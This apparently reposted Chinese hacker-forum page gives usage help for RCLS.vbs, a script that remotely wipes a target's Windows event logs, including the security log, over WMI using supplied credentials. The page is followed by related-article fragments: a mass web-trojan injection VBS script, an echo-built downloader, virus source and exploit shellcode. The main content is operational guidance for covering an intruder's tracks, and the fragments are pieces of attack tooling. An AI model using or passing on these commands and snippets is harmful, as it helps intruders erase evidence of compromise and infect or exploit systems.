RCLS.vbs使用帮助_vbs

********************************************************************************
RCLS v1.05
Remote Clear eventLogs Script, by zzzEVAzzz
Welcome to visite www.isgrey.com
Usage:
cscript c:\scriptpath\RCLS.vbe targetIP username password [lognamelist]
lognamelist:
   logname1[,logname2...]    clear specified logs
   *|-a|-all                 clear all logs
   -v|-view|NULL             enum log names
********************************************************************************

描述:远程清除目标事件日志的windows脚本。
特点:不依赖于目标的ipc$开放与否。
原理:直接访问目标的windows管理规范服务(WMI)。该服务为系统重要服务,默认启动。
支持平台:win2kpro win2kserver winxp win.net
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

c:\>cscript RCLS.vbe <目标IP> <用户名> <密码> [日志名列表]

日志名列表是用逗号","分隔的目标事件日志英文名。
比如system是系统日志,application是应用程序日志,security是安全日志。
这三种日志是系统默认就有的,可以分别使用sys,app,sec作为缩写表示。
对于其他日志需要写明完整英文名(以注册表为准)。

使用*、-a或-all做参数代替日志名列表将清除全部的日志。

没有日志名列表或者使用-v、-view做参数,可以列举目标所有的日志种类的英文名。

空密码用两个双引号""表示。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
如果日志很多,响应会较慢,请等待。

此脚本处于测试阶段,仅限灰色轨迹论坛内部流传。请不要对外公布。谢谢合作。
本人提供有限技术支持,有问题请到论坛发短消息给我。我的ID是zzzevazzz
脚本已做简单加密,暂不公布源代码。(写得烂,不好意思公布啦)

最后更新:2002-8-24
更新记录:
1.05  更改了输出显示格式。
1.04  解决一些错误格式参数的响应问题。
1.03  增加了日志名缩写表示功能。
1.02  增加列举目标日志种类和清除指定日志的功能。
1.01  解决空密码的问题。
1.00  完成基本功能,清除目标全部日志。

时间: 2024-10-25 23:45:20

RCLS.vbs使用帮助_vbs的相关文章

IIS管理脚本之adsutil.vbs的使用说明_vbs

Adsutil.vbs是什么?它是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,位于%SystemDrive%\Inetpub\AdminScripts目录下,95,426字节.这么大的脚本一看就知道功能肯定非常强大,事实也确是如此.我感觉它就是个命令行下的"Internet 信息服务管理器"(事实上Windows 2000用%SystemDrive%\Inetpub\AdminScripts下原有的20多个VBS进行管理,而到了2003则只剩下Adsutil

两个批量挂马vbs脚本代码_vbs

scan.vbe cscript scan.vbe web目录 程序代码: '版权信息 br="************************************" & vbCrLf br=br & "* VBS 批量挂马脚本 *" & vbCrLf br=br & "* BY BanLG *" & vbCrLf br=br & "**************************

收集的一些经典的vbs脚本大全_vbs

记录一些经典的vbs脚本  1.文件下载(无回显)  echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe  echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe  echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe  echo xPost.Open "GET",

LCL.VBS 病毒源代码_vbs

rem email:kouguoxi@hotmail.comrem some crack statement i remment,make it can't to runon error resume next dim title,text title="can you help me find a person?" text="her name is Liu Chun li."&chr(13)&chr(10) text=text&"

TXT转HTM、HTML「TXT转网页」的vbs实现代码_vbs

在众多文本编辑器中,Microsoft的Word是功能很强大的.况且XP PRO本身支持VBS调用Word文档对象,那么使用VBS是最好不过的了.思路如下:VBS打开Word,Word打开TXT,另存为网页,退出. 1. VBS调用Word.Application组件 如果电脑中安装了Word,那么用VBS打开Word其实很简单,如下: Set objWord = CreateObject("Word.Application") objWord.Visible = True 这样可以以

ActiveX漏洞通用Exploit vbs修正版_vbs

C++代码 复制代码 代码如下: #include <stdio.h>      #include <string.h>      unsigned char shellcode[] =      "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"     "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\

XorEncode的vbs实现代码_vbs

复制代码 代码如下: If Not WScript.Arguments.Count=1 Then WScript.Echo "请将要转换的vbs文件托拽到我身上!":WScript.Quit Set fso=CreateObject("Scripting.FileSystemObject") Set self=fso.OpenTextFile(WScript.ScriptFullName) Set vbs=fso.CreateTextFile(Left(WScrip

Win7下VHD文件右键增强实现代码(vbs+注册表)_vbs

1.保存以下代码到:c:\windows\system32\vdm.vbs 复制代码 代码如下: Dim ArgsSet Args = WScript.ArgumentsTranArgs = " "For i = 0 To Args.Count - 1 TranArgs = TranArgs & """" & Args(i) & """" & " " Ne

VBS基础教程_vbs

VBScript(Microsoft Visual Basic Script Editon).,微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源